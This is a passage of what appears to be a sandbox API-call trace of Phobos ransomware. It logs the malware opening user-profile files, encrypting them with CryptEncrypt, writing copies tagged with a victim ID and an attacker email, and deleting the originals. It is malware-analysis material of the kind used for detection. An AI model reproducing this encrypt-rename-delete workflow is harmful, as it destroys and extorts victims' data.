(lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini")) returned 0x2026 [0203.527] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.527] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.527] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.527] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\ntuser.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.528] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.528] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.528] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x14, lpOverlapped=0x0) returned 1 [0203.529] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20, dwBufLen=0x20 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x20) returned 1 [0203.529] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x20, lpOverlapped=0x0) returned 1 [0203.530] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.530] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.530] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.530] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.530] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.530] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.530] CloseHandle (hObject=0x160) returned 1 [0203.530] CloseHandle (hObject=0xfc) returned 1 [0203.530] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini")) returned 1 [0203.531] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.532] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=504) returned 1 [0203.532] CloseHandle (hObject=0xfc) returned 1 [0203.532] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini")) returned 0x26 [0203.532] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\pictures\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.532] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.532] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.532] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\pictures\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.533] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.533] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.533] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1f8, lpOverlapped=0x0) returned 1 [0203.534] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200, dwBufLen=0x200 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200) returned 1 [0203.534] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x200, lpOverlapped=0x0) returned 1 [0203.534] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.534] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.535] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.535] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.535] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.535] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.535] CloseHandle (hObject=0xfc) returned 1 [0203.535] CloseHandle (hObject=0x160) returned 1 [0203.535] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini")) returned 1 [0203.536] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.536] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.536] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=282) returned 1 [0203.536] CloseHandle (hObject=0x160) returned 1 [0203.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini")) returned 0x26 [0203.537] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\saved games\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.537] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.537] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\saved games\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.537] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.537] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.538] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x11a, lpOverlapped=0x0) returned 1 [0203.538] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120, dwBufLen=0x120 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x120) returned 1 [0203.538] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x120, lpOverlapped=0x0) returned 1 [0203.539] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.539] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.539] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.539] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.539] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.539] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.539] CloseHandle (hObject=0x160) returned 1 [0203.539] CloseHandle (hObject=0xfc) returned 1 [0203.540] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini")) returned 1 [0203.540] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.542] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=524) returned 1 [0203.542] CloseHandle (hObject=0xfc) returned 1 [0203.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini")) returned 0x26 [0203.542] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\searches\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.542] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.542] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.542] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\searches\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.543] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.543] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.543] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x20c, lpOverlapped=0x0) returned 1 [0203.552] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x210, dwBufLen=0x210 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x210) returned 1 [0203.552] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x210, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x210, lpOverlapped=0x0) returned 1 [0203.553] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.553] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.553] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.553] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.553] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.553] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.553] CloseHandle (hObject=0xfc) returned 1 [0203.553] CloseHandle (hObject=0x160) returned 1 [0203.553] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini")) returned 1 [0203.554] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.555] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=504) returned 1 [0203.555] CloseHandle (hObject=0x160) returned 1 [0203.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini")) returned 0x26 [0203.555] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\videos\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.555] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.556] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.556] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\videos\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.558] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.558] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.558] ReadFile (in: hFile=0x160, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x1f8, lpOverlapped=0x0) returned 1 [0203.559] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200, dwBufLen=0x200 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x200) returned 1 [0203.559] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x200, lpOverlapped=0x0) returned 1 [0203.559] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.559] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.559] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.559] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.559] WriteFile (in: hFile=0xfc, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.559] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.559] CloseHandle (hObject=0x160) returned 1 [0203.560] CloseHandle (hObject=0xfc) returned 1 [0203.560] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini")) returned 1 [0203.560] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.561] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=174) returned 1 [0203.561] CloseHandle (hObject=0xfc) returned 1 [0203.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini")) returned 0x26 [0203.561] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0203.561] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.561] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0203.561] CreateFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.561] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32a28) returned 1 [0203.561] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.562] ReadFile (in: hFile=0xfc, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xae, lpOverlapped=0x0) returned 1 [0203.562] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0, dwBufLen=0xb0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xb0) returned 1 [0203.562] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xb0, lpOverlapped=0x0) returned 1 [0203.563] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32868) returned 1 [0203.563] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0203.563] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0203.563] CryptDestroyKey (hKey=0xa32868) returned 1 [0203.563] WriteFile (in: hFile=0x160, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0203.563] CryptDestroyKey (hKey=0xa32a28) returned 1 [0203.563] CloseHandle (hObject=0xfc) returned 1 [0203.563] CloseHandle (hObject=0x160) returned 1 [0203.563] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\desktop.ini" (normalized: "c:\\users\\desktop.ini")) returned 1 [0203.564] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0203.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0203.564] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=174) returned 1 [0203.564] CloseHandle (hObject=0x160) returned 1 [0203.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini")) returned 0x26 [0203.564] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\public\\desktop\\desktop.ini.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0203.564] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Desktop\\desktop.ini" (normalized: "c:\\users\\public\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 